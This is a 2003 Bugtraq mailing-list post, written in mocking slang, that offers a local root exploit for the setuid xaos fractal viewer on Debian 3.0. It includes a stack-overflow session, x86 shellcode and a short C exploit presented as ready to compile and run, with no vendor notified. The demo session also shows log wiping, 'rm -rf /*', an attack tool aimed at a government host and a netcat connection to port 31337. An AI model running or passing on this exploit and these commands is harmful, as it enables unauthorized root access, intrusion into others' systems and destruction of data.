[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
From:       "bazarr () ziplip ! com" <bazarr () ziplip ! com>
Date:       2003-06-05 22:27:23
[Download RAW message or body]

bazarr!
["bazarr-episode-4.c" (text/x-csrc)]

/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 whoody              */
/*      by: bazarr                                                           */
/*      bazarr@ziplip.com                                                    */
/* 	bazarr episode #4						     * 
 										

*hendy* i dont build nests for da winter, cause i dont have no time for building \
nests

dis is da advisory and xploit at da same time for a local root hole in debian 3.0. 
if dave censor dis he out of his mind! dis my second local root xploit in a week!
when bugtraq be heading down south to county jail quick wid all da cross site \
scripting bugs and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets \
be real about dis advisorys for non popular software are a dime a dozen. i da first \
young boy to come around  wid real advisorys in many a months. so please gimmie small \
break. 

i release more advisorys den combined times dvdfairy has DoS'd phrack.ru

dats alot!

--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go away)

dianora when i finish "da design and implementation of da 4.4bsd operating system" (A \
BOOK) i be back to challenge you on bsd kernel , den you have no choice but to let me \
stay and give me +v in #openbsd. thank you. (she kicked young 16 year old boy out of \
channel for xposing remote hole in default install!) 

ok lets take a look at the vendor info for xaos:

DESCRIPTION
       XaoS  is a protable real-time interactive fractal zoomer/morpher.  UNIX \
version works under X11, SVGA and text terminals.  If you don't knwo what fractal is \
or you want  to know more about XaoS features you should see animated tutorial.   Run \
XaoS and press 'H' twice.  It is much more fun than reading of boring manual  page  \
:)  and  it  supports foregin languages. You might also read  xaos.info file for some \
advanced stuff (like how to write animations and tutorials manually, port or extend \
XaoS, algo­  rithms used etc.)

first thing dat i spot is spelling mistake please patch 'knwo' into 'no' asap.

so we know dat xaos is a program which you zoom around in when you get real \
stoned(seriously).  lets get to da local root hole in xaos. 

lets take a look at my terminal session wid xaos: 

c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc 
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos 
-rwsr-xr-x    1 root     root       379324 Apr  3  2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will result in uid = \
0  c00l@debian:~/code/dump% #what will i do now?

now what i be doin is dis , bare wid me here fellow security researches (lcamtuf you \
able to keep up wid dis?)  lets keep going into dis adventure, lets check if you be \
vulnerable

c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable to 0day bug \
which i have discovered  c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e \
'print "A"x2049'` ^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable , what now?


after auditing for many a days and many a nights to find dis bug i am still weary \
from all of it.  so lemme try and keep on going through dis adventure wid xaos, lets \
try and xploit it dis time. 

c00l@debian:~/code/dump% ./set #dis put shellcode in enviroment with many a 0x90 \
around it  [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print \
"\x45\xfe\xff\xbf"x8096'` -display A Segmentation fault
[c00l:dump]$ #its not xploitable i guess 
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AA Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AAA Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AAAA sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT 
sh-2.05a# exit    
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit , thanks!

woa dis be going too fast for some security researchers let me slow down and xplain \
dis. 

xaos be doing somthing like dis wid its -language argument 

++++++++
char hoolio[4096]; //big as to not allow stack overflow

strcpy(hoolio,argv[i]) //secure
++++++++

but it is NOT secure , a attacker is able to overflow 'hoolio' wid his own data!
den he overwrite da saved return address on da stack with his own and den he execute \
a shell. 

-------------
ENDING 

xaos is vulnerable to a stack buffer overflow which be yeilding root privleges on \
debian 3.0 (w00dy) 

-------------	
PATCH

see many a people dont understand dis issue, i am young highschool boy 
doing many a bleeding edge freelance security work for free , it not my job to \
provide patch  and pamper you. but if you really dont want to get hacked with many a \
0day xploits just dont go online and dont make fun of caddis cuz he be xploiting your \
ftpd in record time to rm you(seriously man). 

-------------	
VENDORS NOTIFYED

none

-------------	
VENDORS VULNERABLE

debain 3.0 & unstable on default install!!!
FreeBSD x.x ports! 
OpenBSD x.x ports!
NetBSD x.x ports!!! 
anyone who installed xaos!

-------------
XPLOIT 

as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz 
i have trouble programming after last nights crystal meth ride. 

demonstation:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log 
sh-2.05a# cc b.c 
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b 
.... ..... .... .... .... ....
done. 
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos , try 1-4 'a's
woa hey i just made a fool of myself! i dident need any stack padding there.

dis C-code is very complex , do not attempt to modify it. 

it is very user friendly though for da following groups:

1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researches to make money off highschool boy by using dis \
xploit on der clients and charging dem for it 4. elite lurking blackhat laughing at \
my codez! (I CANT SAY I LIKE DIS GROUP ALL DAT MUCH) 

AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR

*/

char c[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
 int main(int cc,char **a) {char x[256];char \
b[72000];memset(b,0x99,sizeof(b));;;memcpy(b+71968,c,strlen(c));/**/;;b[sizeof(b)]=0;;setenv("C",b,1);
 if (!a[1]){printf("[*] bazarr :(\n");exit(1);};/**/;;sprintf(x,"/usr/bin/xaos \
-language `perl -e 'print  \"\x45\xfe\xfe\xbf\"x8096'` -display \
%s",a[1]);;;printf("[*] bazarr :)\n");system(x);}

/* 


-------------
ADVANCE WARNING 

double free() bug in popular suid root application installed by default on debian 3.0 \
comming soon! remote xploit for debian application comming soon!

and so many more i cannot even list dem all(SERIOUSLY). 

16 year old boy release more bugs in few weeks den your whole crew does in da last 5 \
years! i think most of you be a little bitter about dat and dats why you some of you \
be anti bazarr.  your company should stick to hoolio's ftpd server. 

-------------
GREETS

sir hackalot - you cool man! you like the 2pac of hacking. what ever happend to you \
and PHAZE? it been awhile!

-------------
BYE

bye bye guys i gotta go feed the dog and work on math homework.

bye.

-bazarr


*/



[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic